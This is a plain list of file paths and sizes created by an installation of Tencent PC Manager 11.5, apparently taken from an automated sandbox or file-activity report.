%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\PhotoCraftPlugin.png (615 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\CFConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_15.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulInf.Dat (1610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\GameBoxPlugin_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgrCmdline.xml (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.dll (2039 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qmaplocal.dat (109 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\xpNotify.html (549 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.dll (2072 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupTipsMgr\GameSpeedupTipsMgr.rdb (24 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1977.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\JFZRConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPYellowTipsMgr.dll (1483 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.dll (5861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.rdb (40 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\blank_gray.ico (82 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libpng.dll (1406 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulFilter.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.rdb (141 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMRouterPlugin\QMRouterPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.tpc (790 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\xGraphic32.dll (1440 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.tpc (688 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulInc.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.Manifest (466 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCmgrInstallGuide.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll (4388 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1891.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.rdb (6372 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\AutoTaskConfig.bat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\vircmpinfo.def (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibwhite.xml (26 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRepair.rdb (37 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysmalwarejmp\SysMalwareJmp.dll (793 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDLPConfig.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCTray.rdb (122 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1007.dat (503 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\traceclear.dat (13 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1082.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.rdb (230 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\Common.dll (17453 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_558.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport.exe (7337 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\OperationFileCloudMgr.dll (1651 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAutoClean.exe (3202 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AndroidAssistHelper.dll (5558 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_168.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\xImage.dll (3606 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupExposure.dll (2690 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMTrojanScan\QMTrojanScan.dll (10918 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1100.dat (452 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10492.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QMDataUpdate.dll (2857 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMobileFlux\NetMobileFlux.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMIEProtect.sys (1271 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_13.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetRepairPage.js (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.rdb (3795 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCPatch.exe (4811 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_771.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPConfig.rdb (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Common.dll (16830 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr04.def (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDL.exe (2063 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10523.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpccommonmgr.dat (536 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1109.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.exe (3655 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.rdb (3769 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Check_Wireless.png (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMSysSlim.png (691 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysStartupMgrJmp.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.rdb (75 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMProtect.dll (2263 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpctray.dat (704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCPatch.dll (2549 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MXConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\softmgr_notify.ico (289 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1302.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_190.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\StartupLoad.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm04.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.rdb (178 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCAVSetting.rdb (106 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInject.dll (1831 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1409.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCLeakScan.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Scc.dll (5814 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_156.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVE.dll (3805 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMNetworkMgr64.dll (4554 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpktt.dll (27696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.tpc (685 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMIEMalRtpPlugin\QMIEMalRtpPlugin.dll (1967 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NetRepair.dat (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\YLZTConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpDLL.dll (1093 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAccountProtection.rdb (3757 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameSpeedup.rdb (309 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virswf01.def (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScanPluginInfo.xml (36 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QOLogo\Install.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\GarbageSoftInfo.xml (18 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1011.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1021.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysHomePage\HomePageRecommendItemsRes.zip (8 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\KingRoot.png (878 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\jgImage.dll (45 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\arkGraphic.dll (3997 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMShield256.png (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFeedBack.exe (4093 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkreport.dll (3499 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\SoftMon.etf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\ATL80.dll (1213 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMScriptHost.dll (2393 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupTipsMgr\GameSpeedupTipsMgr.tpc (950 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AppLaunch.32.prf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileLinkRepair.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibTray.dat (44 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\npQMExtensionsMozilla.dll (1672 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1403.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\TraceClear\TraceClear.dll (2533 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1526.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_11.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulEngine.dll (5972 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1226.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.rdb (142 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_808.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAntiInject.dll (284 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\ProcessNameList.xml (30 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libjpegturbo.dll (1977 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\extract.dll (3788 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUdisk64.sys (3599 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\tinyxml.dll (299 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\Win10Tips.png (940 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMArpMgr.png (843 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMOfficeScan.dll (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1025.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCB2AndroidJmp.png (276 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.tpc (705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy (808 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.rdb (105 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSysKit64.sys (1412 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.rdb (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\jgIOStub.dll (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_191.png (3 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask71.png (660 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\QMGameAssistantPlugin.dll (2868 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVCleanDr.dll (2402 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.dll (4826 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libexpatw.dll (690 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMCmcTrayPlugin\QMCmcTrayPlugin.dll (3765 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1404.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOWorkFlowMgr.dll (5468 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\point.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\GFCustom.dll (7227 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\xImage.dll (1125 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NPEStartup.db (79 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\WechatBackup.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMLogCtrl\QMLogCtrl.dll (4253 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMExtInstaller.dll (4108 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GFCustom.dll (5925 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\pedc.dat (1615 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\2052\SSOStringBundle.xml (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virdex01.def (131 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMChExt.exe (3304 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\starttips.xml (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ptrate.dll (1660 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\autoinstall.etf (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virsrc00.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUsbGuard.exe (7174 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_529.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHW.sys (35 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\MalWare.tpc (702 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Redusem.ini (25 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\libexpatw.dll (701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1400.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.exe (5156 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_867.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1086.dat (449 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1222.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\GameHardwareInfo.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1221.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\MenuManager.png (789 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibpower.xml (302 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysIconGF.rdb (134 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMHIPSEngine.dll (61 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\Both_Disconnected.png (32 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGamePackagePlugin\QMGamePackagePlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScanPluginMgr.dll (4190 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\ClinicTrayConfig.xml (77 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_125.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SmartInstall.dll (2176 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMHealthAssist.png (894 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCMgr.rdb (7386 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine_Cache\QMCommon.dll (5441 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFTSysShortTask.exe (2205 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.exe (9466 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CheckSysHung.dll (3540 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.tpc (684 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmpredownload\QMPreDownload.dll (4260 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant\QMLOLAssistant\QMLOLAssistantShell.tpc (959 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.dat (832 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.rdb (1625 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRouterMgr.dat (712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\pluginctrl.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1606.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\SysMalwareJmp.png (832 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRealTimeSpeedup.dat (728 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.tpc (591 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.rdb (126 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\BugReportRule.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\jgIOStub.dll (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetConnect\QMNetConnect.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QMNetMon.rdb (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\TestMSVCR.exe (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.tpc (705 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1091.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1008.dat (624 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1607.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftConfig.exe (7946 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameUpgradePlugin\QMGameUpgradePlugin.dll (2138 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\TSVulFWX64.DAT (167 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\AdfilterExtension.sext (177 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetSpeedTest\QMNetSpeedTestDll.dll (1104 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkcom.dll (1855 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGameAssistant.exe (6384 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\Quarantine\CommonIcon\exe_gray.ico (82 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1070.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameUpConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1074.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\USBKey.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.rdb (101 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_533.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tinyxml.dll (1153 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCCommonMgr.rdb (15675 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\IEStartPage.dll (5690 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\notbolock.sys (21 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibwhiteac.xml (965 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAAL64.sys (244 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\MonitorConfig.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpload.exe (2498 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetHlpX64.sys (919 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\PersonaLib.dat (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virinfo.def (52 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMPersonalCenter.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\version.ini (39 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1286.png (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMWebFWCtrl\QMWebFWCtrl.dll (20613 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\xp.png (26 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.dll (4263 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TpkUpdate.exe (2317 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCUpdate.rdb (1425 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\jgImage.dll (749 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr01.def (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1228.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonCallback.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmMat.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Uninst.exe (14031 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMHPScanAv.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSSO\I18N\SSOConfig.xml (394 bytes)
